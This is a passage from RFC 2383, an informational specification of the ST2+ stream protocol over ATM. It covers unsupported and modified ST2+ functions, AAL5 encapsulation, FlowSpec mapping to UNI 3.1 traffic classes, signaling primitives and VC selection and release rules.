RFC 2383 ST2+ over ATM August 1998 The PVCIdentifer field identifies the PVC identifier uniquely assigned between neighboring ST2+ agents. This field is valid only when the VCType field is zero. The UniqueID and OriginIPAddress fields identify the reverse channel of the bi-directional point-to-point SVC that is used by this SID. These fields are valid only when the VCType field is 1. The LIJCallIdentifer field identifies the LIJ Call Identifier for point-to-multipoint SVC. This field is valid only when the VCType field is 5. 3.1.4 Reason Code The extension of the Reason Code (RFC 1819, Section 10.5.3) to the ST2+ over ATM protocol is shown below. 57 CantChange Partial changes not supported. 58 NoRecover Stream recovery not supported. 3.2 Restricted Functions of RFC 1819 ST2+ 3.2.1 FlowSpec changes In the following case, the ST2+ over ATM protocol supports stream FlowSpec changes by using the CHANGE message. o The I-bit is set to 1 and the G-bit is set to 1. In the following case, the CHANGE fails and a REFUSE message, with the E and N-bits set to 1 and the ReasonCode set to CantChange, is propagated upstream. o The I and/or G-bits are set to zero. 3.3 Unsupported Functions of RFC 1819 ST2+ 3.3.1 ST2+ FlowSpec The ST2+ over ATM protocol does not support the ST2+ FlowSpec (RFC 1819, Section 9.2). The ST2+ FlowSpec specifies useful services, but requires the datalink layer to support heterogeneous QoS to receivers. The current ATM standard does not support heterogeneous QoS to receivers. Suzuki Informational [Page 15]
RFC 2383 ST2+ over ATM August 1998 3.3.2 Stream preemption The ST2+ over ATM protocol does not support stream preemption (RFC 1819, Section 6.3). This is because the Integrated Services FlowSpec does not support the concept of precedence. 3.3.3 HELLO message Implementations may not support the HELLO message (RFC 1819, Section 10.4.7) and thus ST2+ agent failure detection using the HELLO message (RFC 1819, Section 6.1.2). This is because ATM has an adequate failure detection mechanism, and the HELLO message is not sufficient for detecting link failure in the ST2+ over ATM protocol, because the ST2+ data and the ST2+ SCMP are forwarded through another VC. 3.3.4 Stream recovery Implementors must select the NoRecover option of the CONNECT message (RFC 1819, Section 4.4.1) with the S-bit set to 1. This is because the descriptions of the stream recovery process in RFC 1819 (Sections 5.3.2, 6.2, and 6.2.1) are unclear and incomplete. It is thus possible that if a link failure occurs and several ST2+ agents detect it simultaneously, the recovery process may encounter problems. The ST2+ over ATM protocol does not support stream recovery. If recovery is needed, the application should support it. A CONNECT message in which the NoRecover option is not selected will fail; a REFUSE message in which the N-bit is set to 1 and the ReaseonCode is set to NoRecover is then propagated upstream. 3.3.5 Subnet Resources Sharing The ST2+ over ATM protocol does not support subnet resources sharing (RFC 1819, Section 7.1.4). This is because ATM does not support the concept of the MAC layer. 3.3.6 IP encapsulation of ST The ST2+ over ATM protocol does not support IP encapsulation of ST (RFC 1819, Section 8.7), because there is no need to implement IP encapsulation in this protocol. 3.3.7 IP Multicasting The ST2+ over ATM protocol does not support IP multicasting (RFC 1819, Section 8.8), because this protocol does not support IP encapsulation of ST. Suzuki Informational [Page 16]
RFC 2383 ST2+ over ATM August 1998 3.4 Modified Functions of RFC 1819 ST2+ The ST2+ receiver-oriented stream creation procedure has some fatal problems: the value of the LnkReferecnce field in the CONNECT message that is a response to a JOIN message is not valid, ST2+ agent cannot update the LnkReference field in the JOIN-REJECT message, and ST2+ agent cannot deliver the JOIN-REJECT message to the target because the JOIN-REJECT message does not contain a TargetList field. To solve these problems, the ST2+ over ATM protocol modifies the ST2+ protocol processing rules. 3.4.1 Modifications of Message Processing Rules Modifications of the CONNECT, JOIN, and JOIN-REJECT message processing rules in the ST2+ over ATM protocol are described in the following. o The target that creates a JOIN message assigns the same value as in the Reference field to the LnkReference field. o The agent that creates a CONNECT message as a response to a JOIN message assigns the same value as in the LnkReference field in the JOIN message to the LnkReference field. In other cases, the value of the LnkReference field in a CONNECT message is zero. o The agent that creates a JOIN-REJECT message assigns the same value as in the LnkReference field in the JOIN message to the LnkReference field. o An intermediate agent must not modify the value of the LnkReference field in the CONNECT, JOIN, or JOIN-REJECT message. Note that this rule differs from the LnkReference field processing rule in the ACCEPT and REFUSE messages. Suzuki Informational [Page 17]
RFC 2383 ST2+ over ATM August 1998 3.4.2 Modified JOIN-REJECT Control Message The modified JOIN-REJECT control message in the ST2+ over ATM protocol is shown in Fig. 3.3 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | OpCode = 9 | 0 | TotalBytes | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Reference | LnkReference | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | SenderIPAddress | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Checksum | ReasonCode | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | GeneratorIPAddress | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ : TargetList : +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Fig. 3.3: JOIN-REJECT Control Message. The TargetList is assigned the same TargetList in the JOIN message as the one that corresponds to the JOIN-REJECT message. 4. Protocol Specification of the User Plane This section specifies the AAL5 PDU encapusulation for the ST2+ Data PDU. 4.1 Service Primitives Provided by User Plane 4.1.1 Overview of interactions The ST2+ data layer entity on the user plane of the ST2+ over ATM protocol provides the following services to the upper layer. o st2p_unitdata.req o st2p_unitdata.ind 4.1.1.1 St2p_unitdata.req The st2p_unitdata.req primitive sends a request for an ST2+ Data PDU transfer to the ST2+ data layer entity. The semantics of the primitive are as follows: Suzuki Informational [Page 18]
RFC 2383 ST2+ over ATM August 1998 st2p_unitdata.req ( pri, sid, data ) The pri parameter specifies priority of ST2+ Data PDU. The sid parameter specifies SID of ST2+ Data PDU. The data parameter specifies ST2+ data to be transferred. 4.1.1.2 St2p_unitdata.ind The st2p_unitdata.ind primitive indicates an ST2+ Data PDU delivery from the ST2+ data layer entity. The semantics of the primitive are as follows: st2p_unitdata.ind ( pri [optional], sid, data, status [optional] ) The pri parameter indicates priority of ST2+ Data PDU, if AAL5 is used for encapsulating the ST2+ Data PDU. The sid parameter indicates SID of ST2+ Data PDU. The data parameter indicates delivered ST2+ data. The status is an optional parameter that indicates whether the delivered ST2+ data is corrupt or not. 4.2 Service Primitives Provided by AAL5 4.2.1 Requirements for AAL5 The requirements for the AAL5 layer on the ST2+ over ATM user plane are as follows: o The SSCS must be null. o Implementations must use message-mode service. Note: Selection of the corrupted SDU delivery option on the receiver side depends on the implementation, so the receiver may or may not be able to select this option. 4.2.2 Overview of Interactions The AAL5 layer entity on the ST2+ over ATM user plane provides the following services to the ST2+ data layer. Suzuki Informational [Page 19]
RFC 2383 ST2+ over ATM August 1998 o AAL5_UNITDATA.req o AAL5_UNITDATA.ind 4.2.2.1 AAL5_UNITDATA.req The AAL5_UNITDATA.req primitive sends a request for an AAL5 data (AAL5 CPCS_SDU) transfer from the ST2+ data layer entity to the AAL5 layer entity. The semantics of the primitive are as follows: AAL5_UNITDATA.req ( DATA, CPCS_LP, CPCS_UU ) The DATA parameter specifies the AAL5 data to be transferred. The CPCS_LP parameter specifies the value of the CLP field in the ATM cell. The CPCS_UU parameter specifies the user-to-user data to be transferred. 4.2.2.2 AAL5_UNITDATA.ind The AAL5_UNITDATA.ind indicates an AAL5 data (AAL5 CPCS_SDU) delivery from the AAL5 layer entity to the ST2+ data layer entity. The semantics of the primitive are as follows: AAL5_UNITDATA.ind ( DATA, CPCS_LP, CPCS_UU, STATUS [optional] ) The DATA parameter indicates the delivered AAL5 data. The CPCS_LP parameter indicates the value of the CLP field in the ATM cell. The CPCS_UU parameter indicates the delivered user-to-user data. The STATUS parameter indicates whether the delivered AAL5 data is corrupt or not. The STATUS parameter is an optional parameter, and valid only when the corrupted SDU delivery option is selected. 4.3 AAL5 Encapsulation for ST2+ Data PDU 4.3.1 Mapping from st2_unitdata.req to AAL5_UNITDATA.req The ST2+ Data PDU is directly assigned to the DATA parameter in AAL5_UNITDATA.req. That is, as shown in Fig. 4.1, the ST2+ Data PDU is mapped to the payload of AAL5 CPCS_PDU. Suzuki Informational [Page 20]
RFC 2383 ST2+ over ATM August 1998 +-------+---------------------------+ | ST | ST2+ data | ST2+ | header| | Data PDU +-------+---------------------------+ : : : : +---------------------------------------+--------+ | CPCS_PDU |PAD|CPCS_PDU| AAL5 | payload | |trailer | CPCS_PDU +---------------------------------------+--------+ Fig. 4.1: Mapping of ST2+ data to AAL5 CPCS_PDU payload. The value of CPCS_LP in AAL5_UNITDATA.req depends on the implementation: 1 (low priority) or zero (high priority) may be assigned permanently, or they may be assigned depending on the value of pri in st2_unitdata.req. The value of the CPCS_UU indication field in AAL5_UNITDATA.req is set to zero. 4.3.2 Mapping from AAL5_UNITDATA.ind to st2p_unitdata.ind The DATA parameter in AL5_UNITDATA.ind is directly assigned to the ST2+ Data PDU. That is, the payload in AAL5 CPCS_PDU is mapped to the ST2+ Data PDU. If the value of STATUS in AAL5_UNITDATA.ind is valid, it is assigned to the status in st2p_unitdata.ind. 4.3.3 Value of MTU The value of MTU is Maximum CPCS_SDU size. 5. Protocol Specification of the Management Plane The management plane specifies the Null FlowSpec, the Controlled-Load Service FlowSpec, and the Guaranteed Service FlowSpec mapping rules for UNI 3.1 traffic management. 5.1 Mapping of the Null FlowSpec The Null FlowSpec is mapped to the UBR (VBR with the Best Effort Indicator). The value of the PCR (CLP=0+1) is shown in section 6.7.2. Suzuki Informational [Page 21]
RFC 2383 ST2+ over ATM August 1998 5.2 Mapping of the Controlled-Load Service FlowSpec The Controlled-Load FlowSpec is mapped to the VBR whose PCR (CLP=0+1), SCR (CLP=0+1), and MBS (CLP=0+1) are specified. The value of the PCR (CLP=0+1) is shown in section 6.7.2. Let scr be the calculated value of the SCR (CLP=0+1). Based on the value of the [r] field in the Controlled-Load FlowSpec, it is given by: scr = ([r] / 48) * S, where S is the coefficient of segmentation, and in an implementation, it must be configurable to any value between 1.0 and 56.0. The recommended default value is 1.2. The value of the SCR (CLP=0+1) is a minimum integer equal to or more than the calculated value of the scr. Let mbs be the calculated value of the MBS (CLP=0+1). Based on the value of the [b] field in the Controlled-Load FlowSpec, it is given by: mbs = ([b] / 48) * S. The value of the MBS (CLP=0+1) is a minimum integer equal to or more than the calculated value of the mbs. The values of the [p] and [m] fields in the Controlled-Load FlowSpec are ignored. 5.3 Mapping of the Guaranteed Service FlowSpec Note: The UNI 3.1 version of the ST2+ over ATM protocol does not support Guaranteed Services. It will be supported by the UNI 3.1/4.0 version. 6. Protocol Specification of the Control Plane This section specifies the rules for encapsulating the ST2+ SCMP PDU into the AAL5 PDU, the relationship between ST2+ SCMP and PVC management for ST2+ data, and the protocol interaction between ST2+ SCMP and UNI 3.1 signaling. 6.1 AAL5 Encapsulation for ST2+ SCMP PDU This subsection describes AAL5 PDU encapsulation for the ST2+ SCMP PDU. ST2+ Data PDU compatible encapsulation, AAL5 encapsulation based on RFC 1483, and on the RFC 1483 extension are specified. Selection of which one to use depends on the implementation. Suzuki Informational [Page 22]
RFC 2383 ST2+ over ATM August 1998 The ST2+ over ATM protocol does not cover a VC (SVC/PVC) that transfers ST2+ SCMP. VCs for IPv4 transfer may be used for ST2+ SCMP transfer, and implementations may provide particular VCs for ST2+ SCMP transfer. Selection of these VCs depends on the implementation. 6.1.1 ST2+ Data PDU compatible encapsulation The ST2+ Data PDU compatible encapsulation is shown in Fig. 6.1: the ST2+ SCMP PDU is mapped to the payload of AAL5 CPCS_PDU. Implementors should note that this encapsulation is not applicable when the ST2+ SCMP PDU is multiplexed with other protocols. +-------+---------------------------+ | ST | ST2+ SCMP | ST2+ | header| | SCMP PDU +-------+---------------------------+ : : : : +---------------------------------------+--------+ | CPCS_PDU |PAD|CPCS_PDU| AAL5 | payload | |trailer | CPCS_PDU +---------------------------------------+--------+ Fig. 6.1: ST2+ Data PDU conpatible encapsulation. 6.1.2 RFC 1483 base encapsulation The RFC 1483 base encapsulation is shown in Fig. 6.2: the ST2+ SCMP PDU with the RFC 1483 LLC encapsulation for routed protocol format is mapped to the payload in AAL5 CPCS_PDU. +------+----------------+ | ST | ST2+ SCMP | ST2+ |header| | SCMP PDU +------+----------------+ : : +---+---+---+-----------------------+ |LLC|OUI|PID| Information | IEEE 802 SNAP | | | | | ISO 8802-2 LLC +---+---+---+-----------------------+ : : +---------------------------------------+--------+ | CPCS_PDU |PAD|CPCS_PDU| AAL5 | payload | |trailer | CPCS_PDU +---------------------------------------+--------+ Fig. 6.2: RFC 1483 base encapsulation. Suzuki Informational [Page 23]
RFC 2383 ST2+ over ATM August 1998 The value of the LLC is 0xAA-AA-03, the value of the OUI is 0x00-00- 00, and the value of the PID is 0x08-00. The classification of the IPv4 and the ST2+ SCMP is determined by the IP version number, which is located in the first four bits of the IPv4 or ST headers. 6.1.3 RFC 1483 extension base encapsulation The RFC 1483 extension base encapsulation is the same as for RFC 1483 base encapsulation, except that the value of the OUI is 0x00-00-5E (IANA) and the value of the PID is 0xXX-XX (TBD). The RFC 1483 base encapsulation for the SCMP is ideal, but requires modifying the IPv4 processing in the driver software of the WS or PC. Therefore, the RFC 1483 base encapsulation may be difficult to implement. This encapsulation is designed to solve this problem. 6.2 Service Primitives Provided by Control Plane RFC 1819 ST2+ does not specify SCMP state machines. And the ST2+ over ATM protocol does not correspond to SCMP state machines. Therefore, the control plane specification assumes the following. o The ST2+ agent has ST2+ SCMP layer entities that correspond to the next hops and the previous hop in the stream. o The SCMP layer entity terminates ACK, ERROR, and timeout processing and provides reliable SCMP delivery. o The origin consists of an upper layer entity, ST2+ SCMP layer entities for next hops, and a routing machine that delivers SCMP messages between these entities. o The intermediate agent consists of ST2+ SCMP layer entities for a previous hop and for next hops and a routing machine that delivers SCMP messages between these entities. o The target consists of an upper layer entity, an ST2+ SCMP layer entity for a previous hop, and a routing machine that delivers SCMP messages between these entities. At least, the ST2+ SCMP layer entity for the next hop provides the following services to the routing machine. o connect.req This primitive sends a request for a CONNECT message transfer to the ST2+ SCMP layer entity. Suzuki Informational [Page 24]
RFC 2383 ST2+ over ATM August 1998 o change.req This primitive sends a request for a CHANGE message transfer to the ST2+ SCMP layer entity. o accept.ind This primitive indicates an ACCEPT message delivery from the ST2+ SCMP layer entity. o disconnect.req This primitive sends a request for a DISCONNECT message transfer to the ST2+ SCMP layer entity. o refuse.ind This primitive indicates a REFUSE message delivery from the ST2+ SCMP layer entity, or indicates detection of an abnormal status such as an illegal message or timeout in the ST2+ SCMP layer entity. At least, the ST2+ SCMP layer entity for the previous hop provides the following services to the routing machine. o connect.ind This primitive indicates a CONNECT message delivery from the ST2+ SCMP layer entity. o change.ind This primitive indicates a CHANGE message delivery from the ST2+ SCMP layer entity. o accept.req This primitive sends a request for an ACCEPT message transfer to the ST2+ SCMP layer entity. o disconnect.ind This primitive indicates a DISCONNECT message delivery from the ST2+ SCMP layer entity, or indicates detection of an abnormal status such as an illegal message or timeout in the ST2+ SCMP layer entity. o refuse.req This primitive sends a request for a REFUSE message transfer to the ST2+ SCMP layer entity. 6.3 Service Primitives Provided by UNI 3.1 Signaling The UNI 3.1 signaling layer entity on the ST2+ over ATM control plane provides the following services to the ST2+ SCMP layer entity. The ST2+ over ATM protocol does not specify the UNI 3.1 signaling state Suzuki Informational [Page 25]
RFC 2383 ST2+ over ATM August 1998 machines. These are defined in [10, 12, 13]. o setup.req This primitive sends a request for a SETUP message transfer from the ST2+ SCMP layer entity to the UNI 3.1 signaling layer entity. The ST2+ SCMP layer entity that sent this primitive receives an acknowledgment. If the setup succeeds the acknowledgment is a setup.conf primitive and if the setup fails it is a release.ind or release.conf primitive. o setup.conf This primitive indicates a CONNECT message delivery from the UNI 3.1 signaling layer entity to the ST2+ SCMP layer entity. o setup.ind This primitive indicates a SETUP message delivery from the UNI 3.1 signaling layer entity to the ST2+ SCMP layer entity. The ST2+ SCMP layer entity that received this primitive sends an acknowledgment. If the setup is accepted the acknowledgment is a setup.resp primitive and if the setup is rejected it is a release.resp primitive if the state of the UNI 3.1 signaling layer entity is U6; otherwise it is a release.req primitive. o setup.resp This primitive sends a request for a CONNECT message transfer from the ST2+ SCMP layer entity to the UNI 3.1 signaling layer entity. The ST2+ SCMP layer entity that sent this primitive receives an acknowledgment. If the setup is completed the acknowledgment is a setup-complete.ind primitive and if the setup fails it is a release.ind or release.conf primitive. o setup-complete.ind This primitive indicates a CONNECT ACKNOWLEDGE message delivery from the UNI 3.1 signaling layer entity to the ST2+ SCMP layer entity. o release.req This primitive sends a request for a RELEASE message transfer from the ST2+ SCMP layer entity to the UNI 3.1 signaling layer entity. The ST2+ SCMP layer entity that sent this primitive receives an acknowledgment that is a release.conf primitive. o release.conf This primitive indicates a RELEASE COMPLETE message delivery, or indicates a RELEASE message delivery when the status of the UNI 3.1 signaling layer entity is U11, or indicates detection of an abnormal status such as an illegal message or timeout in the UNI 3.1 signaling layer entity, from the UNI 3.1 signaling layer entity Suzuki Informational [Page 26]
RFC 2383 ST2+ over ATM August 1998 to the ST2+ SCMP layer entity. o release.ind This primitive indicates a RELEASE message delivery from the UNI 3.1 signaling layer entity to the ST2+ SCMP layer entity when the status of the UNI 3.1 signaling layer entity is other than U11. The ST2+ SCMP layer entity that received this primitive sends an acknowledgment that is a release.resp primitive. And this primitive also indicates detection of an abnormal status such as an illegal message or timeout in the UNI 3.1 signaling layer entity and then a REFUSE message is transferred. In this case, the ST2+ SCMP layer entity that received this primitive receives a release.conf primitive in succession. o release.resp This primitive sends a request for a RELEASE COMPLETE message transfer from the ST2+ SCMP layer entity to the UNI 3.1 signaling layer entity. o add-party.req This primitive sends a request for an ADD PARTY message transfer from the ST2+ SCMP layer entity to the UNI 3.1 signaling layer entity. The ST2+ SCMP layer entity that sent this primitive receives an acknowledgment. If the setup is succeeds the acknowledgment is an add-party.conf primitive and if the setup fails it is a drop-party.conf primitive. o add-party.conf This primitive indicates an ADD PARTY ACKNOWLEDGE message delivery from the UNI 3.1 signaling layer entity to the ST2+ SCMP layer entity. o drop-party.req This primitive sends a request for a DROP PARTY message transfer from the ST2+ SCMP layer entity to the UNI 3.1 signaling layer entity. The ST2+ SCMP layer entity that sent this primitive receives an acknowledgment that is a drop-party.conf primitive. o drop-party.conf This primitive indicates an ADD PARTY REJECT message delivery, or indicates a DROP PARTY ACKNOWLEDGE message delivery, or indicates detection of an abnormal status such as an illegal message or timeout in the UNI 3.1 signaling layer entity, from the UNI 3.1 signaling layer entity to the ST2+ SCMP layer entity. o drop-party.ind This primitive indicates a DROP PARTY message delivery from the UNI 3.1 signaling layer entity to the ST2+ SCMP layer entity. The ST2+ Suzuki Informational [Page 27]
RFC 2383 ST2+ over ATM August 1998 SCMP layer entity that sent this primitive receives an acknowledgment that is a drop-party.resp primitive. o drop-party.resp This primitive sends a request for a DROP PARTY ACKNOWLEDGE message transfer from the ST2+ SCMP layer entity to the UNI 3.1 signaling layer entity. 6.4 VC Style Selection Criteria The ST2+ over ATM protocol supports PVC, the reverse channel of bi- directional SVC, point-to-point SVC, and point-to-multipoint SVC for ST2+ Data PDU transfer. And SVC supports both upstream and downstream call initiation styles. A 32-bit PVC identifier that is unique between neighboring ST2+ agents is assigned to each PVC. And the reverse channel of the bi- directional point-to-point SVC used by the existing stream is identified by the SID of the stream that occupies the forward channel. When the ST2+ agent sets up a stream or changes QoS, the ST2+ agent must select one VC style from these SVC and PVC styles as a hop that is part of the stream. In the ST2+ over ATM protocol, VC style selection criteria depend on the implementation. This subsection describes examples of VC style selection criteria for the ST2+ over ATM protocol as a reference for implementors. Note that the following descriptions in this subsection are not part of the ST2+ over ATM protocol specification. 6.4.1 Examples of PVC selection criteria At least, the ST2+ agent may have to manage the following information for each PVC that can be used by ST2+ Data PDU transfer. o PVC identifier o ATM interface identifier in the ST2+ agent o VPI/VCI o State of VC: e.g. enabled or disabled, occupied or vacant o QoS of VC o Nexthop IP address Suzuki Informational [Page 28]
RFC 2383 ST2+ over ATM August 1998 When a PVC is selected for a hop of a stream, at least confirmations, that is the state of the PVC is vacant and the next hop IP address and QoS are consistent with the requirements from the stream, may be needed. It is also feasible to introduce access lists to each PVC and to consider the access lists in the selection process. Examples of an access list are shown in the following. o Permit or deny use by a stream whose the previous hop is specified. o Permit or deny use by a stream whose the origin is specified. o Permit or deny use by a stream whose the SID is specified. o Permit or deny use by a stream whose the target is specified. o Permit or deny use by a stream whose the target and SAP are specified. o Any combination of the above. 6.4.2 Examples of reverse channel of bi-directional SVC selection criteria At least, the ST2+ agent may have to manage the following information for each reverse channel of bi-directional SVCs. o SID of the stream that occupies the forward channel o ATM interface identifier in the ST2+ agent o VPI/VCI o State of the reverse channel in the VC: e.g. enabled or disabled, occupied or vacant o QoS of VC o Nexthop IP address When a reverse channel of the bi-directional point-to-point SVC used by the existing stream is selected for a hop of a stream, at least confirmations, that is the state of the channel is vacant and the next hop IP address and QoS are consistent with the requirements from the stream, may be needed. Suzuki Informational [Page 29]
RFC 2383 ST2+ over ATM August 1998 It is also feasible to introduce selection rules to the ST2+ agent. Examples of selection rule are shown in the following. o Permit reuse of the reverse channel by a stream whose the origin is one of targets in the stream that occupies the forward channel. o Permit reuse of the reverse channel by a stream whose one of targets is the origin in the stream that occupies the forward channel. o Permit reuse of the reverse channel by a stream whose the previous hop is one of the next hops in the stream that occupies the forward channel. o Any combination of the avobe. 6.4.3 Examples of SVC selection criteria When an SVC is used for a hop of a stream, at first, the ST2+ agent must select point-to-point or point-to-multipoint SVC. Examples of this selection rule are shown in the following. o If the network supports only point-to-point SVC, select it. o If the network supports point-to-multipoint SVC, select it. If point-to-point SVC is selected, the ST2+ agent must select upstream or downstream call initiation style. Examples of this selection rule are shown in the following. o A VC for a stream whose previous hop is specified is initiated from upstream or downstream. o A VC for a stream whose next hop is specified is initiated from upstream or downstream. o A VC for a stream whose origin is specified is initiated from upstream or downstream. o A VC for a stream whose SID is specified is initiated from upstream or downstream. o A VC for a stream whose target is specified is initiated from upstream or downstream. o A VC for a stream whose target and SAP are specified is initiated from upstream or downstream. Suzuki Informational [Page 30]
RFC 2383 ST2+ over ATM August 1998 o Any combination of the above. 6.5 VC Management This subsection specifies VC management in the ST2+ over ATM protocol. 6.5.1 Outgoing call processing of SVC When outgoing call processing of the first leaf of a point-to- multipoint SVC or a point-to-point SVC is required inside the ST2+ SCMP layer entity, a setup.req primitive is sent to the UNI 3.1 signaling layer entity. If the UNI 3.1 signaling layer entity responds with a setup.conf primitive, the call processing is assumed to have succeeded. If the UNI 3.1 signaling layer entity responds with anything other than this primitive, the processing rule is the same as the SVC disconnect processing that is shown in section 6.5.4 and the outgoing call processing is assumed to have failed. When outgoing call processing of a later leaf of a point-to- multipoint SVC is required, an add-party.req primitive is sent to the UNI 3.1 signaling layer entity. If the UNI 3.1 signaling layer entity responds with an add-party.conf primitive, the call processing is assumed to have succeeded. If the UNI 3.1 signaling layer entity responds with anything other than this primitive, the processing rule is the same as the SVC disconnect processing that is shown in section 6.5.4 and the outgoing call processing is assumed to have failed. 6.5.2 Incoming call processing of SVC When an incoming call processing of SVC is required inside the ST2+ SCMP layer entity, it sets a watchdog timer. The time interval of the timer depends on the implementation. The ST2+ SCMP layer entity waits for a setup.ind primitive indication from the UNI 3.1 signaling layer entity. When this primitive is indicated and the parameters in it are acceptable, the ST2+ SCMP layer entity responds with a setup.resp primitive. If the parameters are not acceptable, the ST2+ SCMP layer entity stops the timer, and if the state of the UNI 3.1 signaling layer entity is U6, the entity responds with a release.resp primitive, and if the state is other than this, the entity responds with a release.req primitive, and then waits for a release.conf primitive response and the incoming call processing is assumed to have failed. If the ST2+ SCMP layer entity responds with a setup.resp primitive, then the entity waits for the next primitive indication, and when the next primitive is indicated, the ST2+ SCMP layer entity stops the Suzuki Informational [Page 31]
RFC 2383 ST2+ over ATM August 1998 timer. If a setup-complete.ind primitive is indicated, the incoming call processing is assumed to have succeeded. If the UNI 3.1 signaling layer entity responds with anything other than this primitive or if the timer expires, the processing rule is the same as the SVC disconnect processing that is shown in section 6.5.4 and the incoming call processing is assumed to have failed. 6.5.3 VC release processing inside ST2+ SCMP layer When a VC release is required inside an ST2+ SCMP layer entity, if the previous hop or next hop is connected with a PVC, the PVC state is set to vacant and the VC release processing is assumed to be completed. If the previous hop or next hop is connected with a point-to-point SVC whose reverse channel is occupied, the state of the channel in the VC is set to vacant, the SID information of the VC is updated, and the VC release processing is assumed to be completed. If the previous hop or next hop is connected with a point-to-point SVC whose reverse channel is vacant, if the previous hop is connected with a point-to-multipoint SVC, or if the next hop is connected with a point-to-multipoint SVC and the number of leaves is 1, then the ST2+ SCMP layer entity sends a release.req primitive to the UNI 3.1 signaling layer entity, then waits for a release.conf primitive indication; when one is indicated, the VC release processing is assumed to be completed. If the next hop is connected with a point-to-multipoint SVC and the number of leaves is other than 1, the ST2+ SCMP layer entity sends a drop-party.req primitive to the UNI 3.1 signaling layer entity, then waits for a drop-party.conf primitive indication; when one is indicated, the VC release processing is assumed to be completed. 6.5.4 VC disconnect processing from UNI 3.1 signaling layer If an ST2+ SCMP layer entity corresponds to a UNI 3.1 signaling layer entity, and if the ST2+ SCMP layer entity is sent a release.ind primitive from the UNI 3.1 signaling layer entity, whose cause is a delivery of a RELEASE message, the ST2+ SCMP layer entity responds with a release.resp primitive, and then the VC disconnect processing is assumed to be completed. If the ST2+ SCMP layer entity is sent a release.ind primitive, whose cause is other than the previous case, the ST2+ SCMP layer entity waits for a release.conf primitive response. When a release.conf primitive is indicated, the VC disconnect processing is assumed to be completed. Suzuki Informational [Page 32]
RFC 2383 ST2+ over ATM August 1998 Note that if next hops from ST2+ SCMP layer entities are connected with a point-to-multipoint SVC, the ST2+ SCMP layer entities to next hops correspond to a UNI 3.1 signaling layer entity. In this case, if the ST2+ SCMP layer entities are sent release.ind primitives from the UNI 3.1 signaling layer entity, whose cause is the delivery of a RELEASE message, one of the ST2+ SCMP layer entities responds with a release.resp primitive, and then the VC disconnect processing in the entities that are sent release.ind primitives are assumed to be completed. If the ST2+ SCMP layer entities are sent release.ind primitives, whose cause is other than the previous case, the ST2+ SCMP layer entities wait for release.conf primitives responses. When release.conf primitives are indicated, the VC disconnect processing in the entities that are indicated release.ind primitives are assumed to be completed. If the ST2+ SCMP layer entity is sent a drop-party.ind primitive from the UNI 3.1 signaling layer entity, the ST2+ SCMP layer entity responds with a drop-party.resp primitive, and then the VC disconnect processing is assumed to be completed. If the ST2+ SCMP layer entity is sent a drop-party.conf primitive, the VC disconnect processing is assumed to be completed. 6.6 Additional SCMP Processing Rules This subsection specifies the additional SCMP processing rules that are defined in RFC 1819 ST2+ protocol specification. The following additional rules are applied when the previous hop or next hop is connected with an ATM connection in the ST2+ SCMP layer entity. 6.6.1 Additional connect.req processing rules When a connect.req primitive is sent to the ST2+ SCMP layer entity for the next hop, the entity confirms whether or not the VC for the next hop exists. If it does, the entity forwards a CONNECT message that does not include a VC-type common SCMP element to the next hop. If it does not, the entity selects a VC style. If the result is a PVC or a reverse channel of a bi-directional point-to-point SVC used by an existing stream, the VC state is set to occupied. The entity forwards a CONNECT message with a VC-type common SCMP element that reflects the result of the selection to the next hop. 6.6.2 Additional connect.ind processing rules The ST2+ SCMP layer entity for the previous hop confirms whether or not the CONNECT message includes a VC-type common SCMP element. Suzuki Informational [Page 33]
RFC 2383 ST2+ over ATM August 1998 If a VC-type common SCMP element is not included and the VC for the next hop exists, a connect.ind primitive is sent to the routing machine. If the VC for the next hop does not exist, a REFUSE message is forwarded to the previous hop. If a VC-type common SCMP element is included and a point-to-point SVC, whose calling party is the upstream or downstream, or a point- to-multipoint SVC is specified, a connect.ind primitive is sent to the routing machine. If a PVC or a reverse channel of a bi- directional point-to-point SVC used by an existing stream is specified and the specified VC exists, the VC state is set to occupied and a connect.ind primitive is sent to the routing machine. Otherwise, a REFUSE message is forwarded to the previous hop. 6.6.3 Additional change.req processing rules When a change.req primitive is sent to the ST2+ SCMP layer entity for the next hop, the entity releases the VC whose process is shown in section 6.5.3. Then, the entity selects a VC style. If the result is a PVC or a reverse channel of a bi-directional point-to-point SVC used by an existing stream, the VC state is set to occupied. The entity forwards a CHANGE message with a VC-type common SCMP element that reflects the result of the selection to the next hop. 6.6.4 Additional change.ind processing rules The ST2+ SCMP layer entity for the previous hop confirms whether the CHANGE message includes a VC-type common SCMP element. If a VC-type common SCMP element is not included, a REFUSE message is forwarded to the previous hop. If a VC-type common SCMP element is included, the entity releases the VC whose process is shown in section 6.5.3. If the element specifies a point-to-point SVC, whose calling party is the upstream or downstream, or a point-to-multipoint SVC, a change.ind primitive is sent to the routing machine. If a PVC or a reverse channel of a bi- directional point-to-point SVC used by an existing stream is specified and the specified VC exists, the VC state is set to occupied and a change.ind primitive is sent to the routing machine. Otherwise, a REFUSE message is forwarded to the previous hop. 6.6.5 Additional accept.req processing rules When an accept.req primitive is sent to the ST2+ SCMP layer entity for the previous hop, the entity confirms the state of the UNI 3.1 signaling layer entity. If the state of the entity is other than U0 Suzuki Informational [Page 34]
